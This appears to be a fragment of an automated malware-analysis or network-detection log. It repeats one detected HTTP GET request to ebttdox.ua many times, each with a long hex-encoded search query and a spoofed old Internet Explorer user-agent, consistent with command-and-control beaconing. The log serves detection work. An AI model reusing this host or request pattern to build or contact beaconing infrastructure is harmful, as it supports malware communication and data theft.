                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8978749815a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929e3ac8689317 HTTP/1.1Host: ebttdox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
